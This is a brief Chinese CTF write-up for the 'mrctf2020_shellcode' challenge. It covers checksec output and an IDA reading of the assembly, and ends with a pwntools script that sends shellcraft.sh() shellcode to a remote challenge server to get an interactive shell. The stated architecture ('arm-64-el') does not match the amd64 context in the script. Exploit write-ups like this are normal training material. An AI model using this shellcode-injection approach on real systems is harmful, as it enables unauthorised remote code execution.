1,三连
1、arm-64-el
2、RELRO: Full RELRO
2,IDA分析
无法反编译,直接看汇编:
1、没有发生溢出,缓存区410h,只输入了400h
2、read()完,返回值与0比较,进行跳转short loc_11D6
3、short loc_11D6执行输入buf中的内容,即可构造shellcode
RELRO: Full RELRO完全没起作用,直接构造shellcode输入即可。
3,payload
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
shellcode = asm(shellcraft.sh())
r = remote('node4.buuoj.cn',26790)
#r = process('./mrctf2020_shellcode')
r.send(shellcode)
r.interactive()